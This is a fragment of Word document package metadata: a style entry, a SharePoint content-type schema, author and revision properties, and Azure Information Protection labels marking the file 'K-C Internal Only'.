    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00D12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F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6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05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6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1CE52ACBB254D9616296ABD42B536" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="251857f804ae6160d33e9a25fde832ab">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="7e7243cd-4eff-4a7c-8d74-0306aed924d4" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="d54eea799fdd0d4b1bc09293a6f00a39" ns2:_="">
    <xsd:import namespace="7e7243cd-4eff-4a7c-8d74-0306aed92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43cd-4eff-4a7c-8d74-0306aed92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7EEC6-3559-47E5-8680-5FE177E97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0046CE-D52F-4B2D-A9E7-CCF99C158D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F6858B-57C7-44C5-96F3-209BFAB74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243cd-4eff-4a7c-8d74-0306aed92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AF3F93-8D21-43B7-A062-70298E2BAF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Ragan, Field</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ben Goerz</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-07T16:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-11T03:34:00Z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5bf2daf4-e275-437f-9dc9-36f6d0708f59">
    <vt:lpwstr>v=1.2&gt;I=5bf2daf4-e275-437f-9dc9-36f6d0708f59&amp;N=K-C+Internal+Use+Only&amp;V=1.2&amp;U=KCUS%5cu11440&amp;A=Associated&amp;H=False</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Classification">
    <vt:lpwstr>K-C Internal Use Only|Footer Image</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_IQPDocumentId">
    <vt:lpwstr>b8795961-48df-4d44-85e7-a493592363c7</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_SIProp12DataClass+6902261e-ad9e-4b29-91d1-2d4dca2b2129">
    <vt:lpwstr>v=1.2&gt;I=6902261e-ad9e-4b29-91d1-2d4dca2b2129&amp;N=Footer+Image&amp;V=1.3&amp;U=System&amp;D=System&amp;A=Associated&amp;H=False</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ContentTypeId">
    <vt:lpwstr>0x0101004A81CE52ACBB254D9616296ABD42B536</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_SiteId">
    <vt:lpwstr>fee2180b-69b6-4afe-9f14-ccd70bd4c737</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_Owner">
    <vt:lpwstr>dalit.ben-izhak@kcc.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_SetDate">
    <vt:lpwstr>2020-09-07T15:16:12.4927031Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_Name">
    <vt:lpwstr>K-C Internal Only</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_ActionId">
    <vt:lpwstr>b8108c3a-0966-4555-abcf-3585f8df9fdd</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="MSIP_Label_f3a425e9-ff5b-4164-ab21-177a29e6432d_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="KCAutoClass">
    <vt:lpwstr>K-C Internal Only</vt:lpwstr>
  </property>
</Properties>
</file>